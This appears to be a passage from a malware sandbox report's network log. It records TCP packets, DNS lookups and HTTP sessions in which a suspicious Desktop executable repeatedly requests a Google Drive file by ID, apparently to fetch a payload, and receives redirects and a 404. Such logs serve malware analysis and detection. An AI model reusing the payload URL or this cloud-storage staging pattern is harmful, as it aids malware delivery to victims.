                                                              Dec 3, 2024 17:33:47.033377886 CET44349913172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:33:47.033426046 CET49913443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:47.033612013 CET49913443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:47.034774065 CET44349913172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:33:47.034843922 CET49913443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:47.184026957 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:47.184062004 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:47.184138060 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:47.184432983 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:47.184448957 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:48.940082073 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:48.940161943 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:49.015134096 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:49.015168905 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:49.015507936 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:49.015568018 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:49.024219036 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:49.067341089 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:49.893646955 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:49.893719912 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:49.893738985 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:49.893794060 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:49.893923998 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:49.893976927 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:49.894464016 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:49.894515991 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:49.894526005 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:49.894567013 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:49.900584936 CET49918443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:33:49.900599003 CET44349918142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:33:59.928159952 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:59.928215981 CET44349948172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:33:59.928276062 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:59.929634094 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:59.929645061 CET44349948172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:01.717998981 CET44349948172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:01.718099117 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:01.718732119 CET44349948172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:01.718789101 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:01.720364094 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:01.720375061 CET44349948172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:01.720633030 CET44349948172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:01.720681906 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:01.721115112 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:01.767338991 CET44349948172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:02.635776043 CET44349948172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:02.635900021 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:02.635945082 CET44349948172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:02.635993958 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:02.636096001 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:02.636140108 CET44349948172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:02.636190891 CET49948443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:02.645817041 CET49954443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:02.645863056 CET44349954142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:02.645945072 CET49954443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:02.646167040 CET49954443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:02.646184921 CET44349954142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:04.397547960 CET44349954142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:04.397655964 CET49954443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:04.398216009 CET49954443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:04.398224115 CET44349954142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:04.398411036 CET49954443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:04.398416996 CET44349954142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:05.341926098 CET44349954142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:05.342019081 CET44349954142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:05.342031002 CET49954443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:05.342047930 CET44349954142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:05.342062950 CET49954443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:05.342092037 CET49954443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:05.342097044 CET44349954142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:05.342125893 CET44349954142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:05.342164993 CET49954443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:05.342858076 CET49954443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:05.342875957 CET44349954142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:15.363076925 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:15.363132000 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:15.363203049 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:15.363512993 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:15.363527060 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:17.109009981 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:17.109206915 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:17.109788895 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:17.109853983 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:17.111843109 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:17.111857891 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:17.112112045 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:17.112164974 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:17.112514973 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:17.155332088 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:18.069561005 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:18.069642067 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:18.069663048 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:18.069704056 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:18.072207928 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:18.072249889 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:18.072256088 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:18.072315931 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:18.084497929 CET49976443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:18.084517002 CET44349976172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:18.301068068 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:18.301127911 CET44349977142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:18.301192999 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:18.301594019 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:18.301606894 CET44349977142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:20.088489056 CET44349977142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:20.088555098 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:20.089174032 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:20.089180946 CET44349977142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:20.089349031 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:20.089353085 CET44349977142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:21.042052984 CET44349977142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:21.042200089 CET44349977142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:21.042269945 CET44349977142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:21.042304039 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:21.042304039 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:21.042330027 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:21.042812109 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:21.042829990 CET44349977142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:21.042843103 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:21.042877913 CET49977443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:31.079636097 CET49978443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:31.079706907 CET44349978172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:31.079792023 CET49978443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:31.080178976 CET49978443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:31.080198050 CET44349978172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:32.773159981 CET44349978172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:32.776065111 CET49978443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:32.776505947 CET49978443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:32.776519060 CET44349978172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:32.776710987 CET49978443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:32.776717901 CET44349978172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:33.722728014 CET44349978172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:33.722847939 CET49978443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:33.722867966 CET44349978172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:33.722918987 CET49978443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:33.723033905 CET49978443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:33.723072052 CET44349978172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:33.723126888 CET49978443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:33.741087914 CET49979443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:33.741149902 CET44349979142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:33.741239071 CET49979443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:33.741483927 CET49979443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:33.741507053 CET44349979142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:35.606815100 CET44349979142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:35.606887102 CET49979443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:35.607336044 CET49979443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:35.607347012 CET44349979142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:35.607539892 CET49979443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:35.607543945 CET44349979142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:36.578711033 CET44349979142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:36.578845024 CET49979443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:36.578916073 CET44349979142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:36.578967094 CET49979443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:36.578980923 CET44349979142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:36.578989983 CET44349979142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:36.579035044 CET49979443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:36.579716921 CET49979443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:36.579731941 CET44349979142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:46.613140106 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:46.613187075 CET44349980172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:46.613320112 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:46.613655090 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:46.613671064 CET44349980172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:48.372365952 CET44349980172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:48.372526884 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:48.373130083 CET44349980172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:48.373214006 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:48.374660015 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:48.374667883 CET44349980172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:48.374908924 CET44349980172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:48.375006914 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:48.375271082 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:48.419333935 CET44349980172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:49.302124023 CET44349980172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:49.302203894 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:49.302344084 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:49.302403927 CET44349980172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:49.302452087 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:49.302453995 CET44349980172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:34:49.302503109 CET49980443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:34:49.319600105 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:49.319631100 CET44349981142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:49.319700956 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:49.319933891 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:49.319945097 CET44349981142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:51.163810015 CET44349981142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:51.163933992 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:51.164475918 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:51.164488077 CET44349981142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:51.164664984 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:51.164669037 CET44349981142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:52.124407053 CET44349981142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:52.124533892 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:52.124541998 CET44349981142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:52.124571085 CET44349981142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:52.124591112 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:52.124609947 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:52.125036001 CET44349981142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:52.125091076 CET44349981142.250.181.129192.168.2.7
                                                              Dec 3, 2024 17:34:52.125092983 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:52.125142097 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:52.125345945 CET49981443192.168.2.7142.250.181.129
                                                              Dec 3, 2024 17:34:52.125360966 CET44349981142.250.181.129192.168.2.7
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 3, 2024 17:33:44.213413954 CET5133053192.168.2.71.1.1.1
                                                              Dec 3, 2024 17:33:44.351675987 CET53513301.1.1.1192.168.2.7
                                                              Dec 3, 2024 17:33:47.044327974 CET6001453192.168.2.71.1.1.1
                                                              Dec 3, 2024 17:33:47.183083057 CET53600141.1.1.1192.168.2.7
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 3, 2024 17:33:44.213413954 CET192.168.2.71.1.1.10x77cfStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                              Dec 3, 2024 17:33:47.044327974 CET192.168.2.71.1.1.10xc2feStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 3, 2024 17:33:44.351675987 CET1.1.1.1192.168.2.70x77cfNo error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                              Dec 3, 2024 17:33:47.183083057 CET1.1.1.1192.168.2.70xc2feNo error (0)drive.usercontent.google.com142.250.181.129A (IP address)IN (0x0001)false
                                                              • drive.google.com
                                                              • drive.usercontent.google.com
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.749913172.217.19.1744437768C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-03 16:33:46 UTC216OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              2024-12-03 16:33:47 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Tue, 03 Dec 2024 16:33:46 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-cRYIL9BjdQue89MOjlgPvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.749918142.250.181.1294437768C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-03 16:33:49 UTC258OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              2024-12-03 16:33:49 UTC2228INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Tue, 03 Dec 2024 16:33:49 GMT
                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                              Content-Security-Policy: script-src 'nonce-Pf2QYByosBJLJBfNTJWM0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              X-GUploader-UploadID: AFiumC73R2BTp8KyqX94fn1-YfahOJ-mx8PRvpzs9iqOOlcz3Ogp-_OSVF-L7I75E7EN71YhqddZkt_HMA
                                                              Server: UploadServer
                                                              Set-Cookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA; expires=Wed, 04-Jun-2025 16:33:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2024-12-03 16:33:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 43 41 4a 39 61 45 32 71 4f 6f 56 6f 4c 4d 52 78 37 64 46 68 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VCAJ9aE2qOoVoLMRx7dFhQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.749948172.217.19.1744437768C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-03 16:34:01 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
                                                              2024-12-03 16:34:02 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Tue, 03 Dec 2024 16:34:02 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: script-src 'nonce-2yrgIP4Nm5dA3A5UVBq0VA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


